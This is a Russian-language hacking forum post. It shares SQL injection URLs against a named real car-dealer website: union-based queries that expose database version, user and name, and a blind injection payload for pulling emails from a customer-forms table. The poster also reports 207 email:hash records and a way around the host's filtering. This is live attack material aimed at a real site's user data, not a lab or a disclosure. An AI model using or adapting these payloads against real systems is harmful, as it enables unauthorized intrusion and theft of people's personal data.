29.10.2011, 07:37
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от AC//DC
http://www.ford-nnov.ru/index.php?page=42&idm=-3+and+1=2+union+select+1,2,3,concat_ws(0x3a,@@vers ion,user(),database()),5,6,7,8+--
дальнейшие действия блокирует sweb
http://www.ford-nnov.ru/index.php?page=42&idm=-3+and+1=2+union+select+1,2,3,4,5,6,7,8+from+admin--
Крутил бы через слепую. Я уже писал, что раскручивание скулей через слепую инъекцию spaceweb не блокирует.
В твоём случае:
Код:
http://www.ford-nnov.ru/index.php?page=42&idm=-3+or+ascii(substring((select+anket_forms.email+from+fordnnov.anket_forms+order+by+id+limit+0,1),1,1))=97
Там 207 записей вида email:hash
Вот только авторизации я не нашёл
|
|
|